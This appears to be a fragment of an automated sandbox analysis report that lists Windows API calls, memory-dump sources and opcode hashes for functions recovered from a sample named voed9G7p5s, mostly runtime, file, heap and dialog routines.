                                                                                                    • API String ID: 3519838083-0
                                                                                                    • Opcode ID: f38cc2fed1f7dcbe003f44648be20f4bf9a5e3972d278ed3eae5cfc3c0d5cce1
                                                                                                    • Instruction ID: df570d22dc215dc5369f53e7400bb37255fd804926af54e53210ee5008edad2d
                                                                                                    • Opcode Fuzzy Hash: f38cc2fed1f7dcbe003f44648be20f4bf9a5e3972d278ed3eae5cfc3c0d5cce1
                                                                                                    • Instruction Fuzzy Hash: 344167B0905B409EE724CF798885AE6FBE5BF18300F50596EE5FE97282CB712694CB10
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID:
                                                                                                    • API String ID: 3519838083-0
                                                                                                    • Opcode ID: 720077dbef1d45e7ced00770c26581190208e923de32eb568421be96d951870f
                                                                                                    • Instruction ID: 52b5f560caecc61a014f75d8fa893b8f96b63ccffa84dd62740c617bdf3312f8
                                                                                                    • Opcode Fuzzy Hash: 720077dbef1d45e7ced00770c26581190208e923de32eb568421be96d951870f
                                                                                                    • Instruction Fuzzy Hash: EA21E6B5E40211AFDB14DF74CC416AAB6A8FB08318F00113AE506B6781D3B09A80C7E8
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 00E1B098
                                                                                                      • Part of subcall function 00E013DC: __EH_prolog.LIBCMT ref: 00E013E1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID:
                                                                                                    • API String ID: 3519838083-0
                                                                                                    • Opcode ID: 42b43dc463b2da5889983b512e7d7db1f58ba38c90114467157166ba21280990
                                                                                                    • Instruction ID: 195aba5829aad6954f2b4bb026b134c500f7da1c2b404cf0e92759ab0edd7f12
                                                                                                    • Opcode Fuzzy Hash: 42b43dc463b2da5889983b512e7d7db1f58ba38c90114467157166ba21280990
                                                                                                    • Instruction Fuzzy Hash: E4316B71D05249AACF15DF64D8519EEBBF4AF09304F10549EE809B7282D735AE44CBA1
                                                                                                    APIs
                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00E2ACF8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc
                                                                                                    • String ID:
                                                                                                    • API String ID: 190572456-0
                                                                                                    • Opcode ID: d914477b4c047877e201c93d7abe3ca6ec1a77c4416e28475031b1f51de7d588
                                                                                                    • Instruction ID: 99f01c5b8defbda0ab3f226c96c70e1ea8e6968c49cc5842970b489d4d7a9196
                                                                                                    • Opcode Fuzzy Hash: d914477b4c047877e201c93d7abe3ca6ec1a77c4416e28475031b1f51de7d588
                                                                                                    • Instruction Fuzzy Hash: 4A113A336006395F8B219E2DFC4189AB396AB8436871E5131FC15FB354D730DC0187D2
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID:
                                                                                                    • API String ID: 3519838083-0
                                                                                                    • Opcode ID: 69ddabd6fc9b3123efc7e2a37127c6bc6c252d42856a55d40df06b9ee6240064
                                                                                                    • Instruction ID: 2b5cc4d370b530b5b87421442f6931bac836724c5ce21aa62b043499f5be9667
                                                                                                    • Opcode Fuzzy Hash: 69ddabd6fc9b3123efc7e2a37127c6bc6c252d42856a55d40df06b9ee6240064
                                                                                                    • Instruction Fuzzy Hash: 74016533D01568ABCF15AFA8CD819DEB775AF88750F015515F816BB2A3DA348D84C7A0
                                                                                                    APIs
                                                                                                      • Part of subcall function 00E2B136: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00E29813,00000001,00000364,?,00E240EF,?,?,00E41098), ref: 00E2B177
                                                                                                    • _free.LIBCMT ref: 00E2C4E5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: AllocateHeap_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 614378929-0
                                                                                                    • Opcode ID: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                                                                    • Instruction ID: 73924358ec96e638e5dac4152582682ea768298023e9b356e75ff455a489b488
                                                                                                    • Opcode Fuzzy Hash: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                                                                    • Instruction Fuzzy Hash: DD0149722003156BE3319F65E88196EFBECFB89330F35192DE194A32C1EA30A905C734
                                                                                                    APIs
                                                                                                    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00E29813,00000001,00000364,?,00E240EF,?,?,00E41098), ref: 00E2B177
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: AllocateHeap
                                                                                                    • String ID:
                                                                                                    • API String ID: 1279760036-0
                                                                                                    • Opcode ID: d19a87f4a63203ef348adedb9f74c9d8194354bef2b6b76cd50a565db589a867
                                                                                                    • Instruction ID: a0393f03da5a66b45392e80502954f805d27a01ae6a870be0da45e342437c6fa
                                                                                                    • Opcode Fuzzy Hash: d19a87f4a63203ef348adedb9f74c9d8194354bef2b6b76cd50a565db589a867
                                                                                                    • Instruction Fuzzy Hash: 29F0B4325075386BEB215A22BC1AB9F7788AB41770B18A151F808BA191CB60D92182E0
                                                                                                    APIs
                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00E23C3F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc
                                                                                                    • String ID:
                                                                                                    • API String ID: 190572456-0
                                                                                                    • Opcode ID: cb563128bdac267788392a6c1cf53eb575b98b416bcb05ee304b92af170f2b50
                                                                                                    • Instruction ID: bf79ab7dc1c63ccbdcea2c3b4429874b3684c7493c3f12ae66055188713124a7
                                                                                                    • Opcode Fuzzy Hash: cb563128bdac267788392a6c1cf53eb575b98b416bcb05ee304b92af170f2b50
                                                                                                    • Instruction Fuzzy Hash: 3FF0A0322002269F8F158EB9FC0599AB7A9EF01B647105224FA15F7190DB35DA20CFA0
                                                                                                    APIs
                                                                                                    • RtlAllocateHeap.NTDLL(00000000,?,?,?,00E24286,?,0000015D,?,?,?,?,00E25762,000000FF,00000000,?,?), ref: 00E28E38
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocateHeap
                                                                                                    • String ID:
                                                                                                    • API String ID: 1279760036-0
                                                                                                    • Opcode ID: d8be523cf62eb37b8d683d174df67e54b4320bf368efe84cd9871df2f742db10
                                                                                                    • Instruction ID: cb109408337e73f1cb293670665568b94c33659da7173ef942eebdc958a3af5f
                                                                                                    • Opcode Fuzzy Hash: d8be523cf62eb37b8d683d174df67e54b4320bf368efe84cd9871df2f742db10
                                                                                                    • Instruction Fuzzy Hash: C3E06D316072355AEA712666BE09B9F7A889F417B8F177121AC59B6091CF60CC0082E2
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 00E05AC2
                                                                                                      • Part of subcall function 00E0B505: __EH_prolog.LIBCMT ref: 00E0B50A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID:
                                                                                                    • API String ID: 3519838083-0
                                                                                                    • Opcode ID: 234c6dfd1a73402b03922c3d59cc6c59663236b3925f7a76987aad00055c7209
                                                                                                    • Instruction ID: 7d8d1a7d27b2f31dad298f477075a99ce773f3ef5bb984077abc67e7d9d8509c
                                                                                                    • Opcode Fuzzy Hash: 234c6dfd1a73402b03922c3d59cc6c59663236b3925f7a76987aad00055c7209
                                                                                                    • Instruction Fuzzy Hash: E3018C30810690DED725E7B8C0457DDFBE4AF64304F50948EA45A73682CBB81B88D7A2
                                                                                                    APIs
                                                                                                      • Part of subcall function 00E0A69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00E0A592,000000FF,?,?), ref: 00E0A6C4
                                                                                                      • Part of subcall function 00E0A69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00E0A592,000000FF,?,?), ref: 00E0A6F2
                                                                                                      • Part of subcall function 00E0A69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00E0A592,000000FF,?,?), ref: 00E0A6FE
                                                                                                    • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00E0A598
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Find$FileFirst$CloseErrorLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 1464966427-0
                                                                                                    • Opcode ID: b05ac6bd292a5113e17ad9a7ac8c10c2d2819a6611117390c721a2190f2a76a0
                                                                                                    • Instruction ID: d639ead0658883d19a5bd1a2b65ab672f33bad6f1193ec21c7401482d43b2db4
                                                                                                    • Opcode Fuzzy Hash: b05ac6bd292a5113e17ad9a7ac8c10c2d2819a6611117390c721a2190f2a76a0
                                                                                                    • Instruction Fuzzy Hash: 25F05E31009794AECA225BB48905BCABBE06F1A321F089A59F1F9621E6C27550D89B23
                                                                                                    APIs
                                                                                                    • SetThreadExecutionState.KERNEL32(00000001), ref: 00E10E3D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExecutionStateThread
                                                                                                    • String ID:
                                                                                                    • API String ID: 2211380416-0
                                                                                                    • Opcode ID: 8518f67b6cac38ab193bf6543d8ba1c612ce0a65d4e6a1005897f34a6cc343b0
                                                                                                    • Instruction ID: e8245a592020f32bbb22896583922c61b2e0e2e06118f4993b455aeebbdc1dd4
                                                                                                    • Opcode Fuzzy Hash: 8518f67b6cac38ab193bf6543d8ba1c612ce0a65d4e6a1005897f34a6cc343b0
                                                                                                    • Instruction Fuzzy Hash: 0CD02B206050645EEF21733A6859BFE2A868FC7310F0C20A5F1457B5D3CE8408C7A261
                                                                                                    APIs
                                                                                                    • GdipAlloc.GDIPLUS(00000010), ref: 00E1A62C
                                                                                                      • Part of subcall function 00E1A3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00E1A3DA
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Gdip$AllocBitmapCreateFromStream
                                                                                                    • String ID:
                                                                                                    • API String ID: 1915507550-0
                                                                                                    • Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                                                                    • Instruction ID: eb668b2a705ddc836a807c7f157498a6bb8538760badb75bc30e42e487cc0e2c
                                                                                                    • Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                                                                    • Instruction Fuzzy Hash: D9D0C971215209BADF526B618C12AFE7AE9EB00744F089139BC42E5291EAB1D990A662
                                                                                                    APIs
                                                                                                    • DloadProtectSection.DELAYIMP ref: 00E1E5E3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DloadProtectSection
                                                                                                    • String ID:
                                                                                                    • API String ID: 2203082970-0
                                                                                                    • Opcode ID: 17ab5cebd37eed04d7a48daef3b36c18c1a0c65582451e6f5316948bd1d4858d
                                                                                                    • Instruction ID: ee0f9ec1acce499377e00142ff6e39fe75d055426ea58ad83a1004a2f0d4fe55
                                                                                                    • Opcode Fuzzy Hash: 17ab5cebd37eed04d7a48daef3b36c18c1a0c65582451e6f5316948bd1d4858d
                                                                                                    • Instruction Fuzzy Hash: FFD022B02C42408FD30BEBA9B846FCDB7E2B324788FC82081F924F1390CBA080C4D601
                                                                                                    APIs
                                                                                                    • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00E11B3E), ref: 00E1DD92
                                                                                                      • Part of subcall function 00E1B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00E1B579
                                                                                                      • Part of subcall function 00E1B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E1B58A
                                                                                                      • Part of subcall function 00E1B568: IsDialogMessageW.USER32(00010420,?), ref: 00E1B59E
                                                                                                      • Part of subcall function 00E1B568: TranslateMessage.USER32(?), ref: 00E1B5AC
                                                                                                      • Part of subcall function 00E1B568: DispatchMessageW.USER32(?), ref: 00E1B5B6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                                                                    • String ID:
                                                                                                    • API String ID: 897784432-0
                                                                                                    APIs
                                                                                                    • GetFileType.KERNELBASE(000000FF,00E097BE), ref: 00E098C8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: FileType
                                                                                                    • String ID:
                                                                                                    • API String ID: 3081899298-0
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E3FC
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-0
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E3FC
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-0
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E3FC
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-0
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E3FC
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-0
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E3FC
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-0
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E3FC
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-0
                                                                                                    • Opcode ID: 1ab792d9324a7ea0b1feb0ca0e80e7f7ffda205a0fddd7c9e9d4da00eefc9c27
                                                                                                    • Instruction ID: a6089b6a95a2746bee86c72bc95e0b1de7b2b98b1252e16971428dc1e9ebdd17
                                                                                                    • Opcode Fuzzy Hash: 1ab792d9324a7ea0b1feb0ca0e80e7f7ffda205a0fddd7c9e9d4da00eefc9c27
                                                                                                    • Instruction Fuzzy Hash: 83A011F22AC222BC300C22002C0BCFB020CC8C0F20330B82EFC22B0280A88008820833
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E3FC
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-0
                                                                                                    • Opcode ID: 80ec9d718883dff5c7a8ff040809229b8a7fe0e21e38f2f59f61c7791190dc5c
                                                                                                    • Instruction ID: a6089b6a95a2746bee86c72bc95e0b1de7b2b98b1252e16971428dc1e9ebdd17
                                                                                                    • Opcode Fuzzy Hash: 80ec9d718883dff5c7a8ff040809229b8a7fe0e21e38f2f59f61c7791190dc5c
                                                                                                    • Instruction Fuzzy Hash: 83A011F22AC222BC300C22002C0BCFB020CC8C0F20330B82EFC22B0280A88008820833
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E3FC
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-0
                                                                                                    • Opcode ID: b7d6388a3f7dee9f3056a63097eb5c041b6c98ed0bdc8e1a0ae31b2633119440
                                                                                                    • Instruction ID: a6089b6a95a2746bee86c72bc95e0b1de7b2b98b1252e16971428dc1e9ebdd17
                                                                                                    • Opcode Fuzzy Hash: b7d6388a3f7dee9f3056a63097eb5c041b6c98ed0bdc8e1a0ae31b2633119440
                                                                                                    • Instruction Fuzzy Hash: 83A011F22AC222BC300C22002C0BCFB020CC8C0F20330B82EFC22B0280A88008820833
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E3FC
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-0
                                                                                                    • Opcode ID: e5172f0ed88e13d81c8988ff256fc7c744694572fd70a7920fc2d9503281c12e
                                                                                                    • Instruction ID: a6089b6a95a2746bee86c72bc95e0b1de7b2b98b1252e16971428dc1e9ebdd17
                                                                                                    • Opcode Fuzzy Hash: e5172f0ed88e13d81c8988ff256fc7c744694572fd70a7920fc2d9503281c12e
                                                                                                    • Instruction Fuzzy Hash: 83A011F22AC222BC300C22002C0BCFB020CC8C0F20330B82EFC22B0280A88008820833
                                                                                                    APIs
                                                                                                    • SetEndOfFile.KERNELBASE(?,00E0903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00E09F0C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File
                                                                                                    • String ID:
                                                                                                    • API String ID: 749574446-0
                                                                                                    • Opcode ID: cd4b2ab505be873e8e249cee81c53daf59005ed429b29687ae04149ef9debceb
                                                                                                    • Instruction ID: c165020775bf0390ac910c4682cd31dc9fb240d2b93b248547b10d5ea50c4bbd
                                                                                                    • Opcode Fuzzy Hash: cd4b2ab505be873e8e249cee81c53daf59005ed429b29687ae04149ef9debceb
                                                                                                    • Instruction Fuzzy Hash: 89A0113008800E8AAE002B32CA0880C3B20EB20BC030002A8A00ACA0A2CB2A880B8A00
                                                                                                    APIs
                                                                                                    • SetCurrentDirectoryW.KERNELBASE(?,00E1AE72,C:\Users\user\Desktop,00000000,00E4946A,00000006), ref: 00E1AC08
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentDirectory
                                                                                                    • String ID:
                                                                                                    • API String ID: 1611563598-0
                                                                                                    • Opcode ID: 9d690511e471daac836db672f7f5c9365c5263e676397cc061cf79624cb3c740
                                                                                                    • Instruction ID: bf904c90a37a342e33e448849be7f85600575a6b0ddb3d0faaf768503f34cb64
                                                                                                    • Opcode Fuzzy Hash: 9d690511e471daac836db672f7f5c9365c5263e676397cc061cf79624cb3c740
                                                                                                    • Instruction Fuzzy Hash: D2A011302022008B82000B328F0AA0EBAAAAFA2B20F00C028A00080030CB30C820AA00
                                                                                                    APIs
                                                                                                    • CloseHandle.KERNELBASE(000000FF,?,?,00E095D6,?,?,?,?,?,00E32641,000000FF), ref: 00E0963B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseHandle
                                                                                                    • String ID:
                                                                                                    • API String ID: 2962429428-0
                                                                                                    • Opcode ID: ed4950cf30c98a90068e0da1bd35cf613d173ebe6bac0956653e3b0fc9de4ebb
                                                                                                    • Instruction ID: 3270c55f92402b4105fd1a4538bcd3fd6fc6380c4ff7244a2fc2d3165f1c7fc9
                                                                                                    • Opcode Fuzzy Hash: ed4950cf30c98a90068e0da1bd35cf613d173ebe6bac0956653e3b0fc9de4ebb
                                                                                                    • Instruction Fuzzy Hash: CEF082704C1B159FDB308E74E458B92B7E8AB12329F042B1ED0E6629E2D77269CD8A40
                                                                                                    APIs
                                                                                                      • Part of subcall function 00E01316: GetDlgItem.USER32(00000000,00003021), ref: 00E0135A
                                                                                                      • Part of subcall function 00E01316: SetWindowTextW.USER32(00000000,00E335F4), ref: 00E01370
                                                                                                    • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00E1C2B1
                                                                                                    • EndDialog.USER32(?,00000006), ref: 00E1C2C4
                                                                                                    • GetDlgItem.USER32(?,0000006C), ref: 00E1C2E0
                                                                                                    • SetFocus.USER32(00000000), ref: 00E1C2E7
                                                                                                    • SetDlgItemTextW.USER32(?,00000065,?), ref: 00E1C321
                                                                                                    • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00E1C358
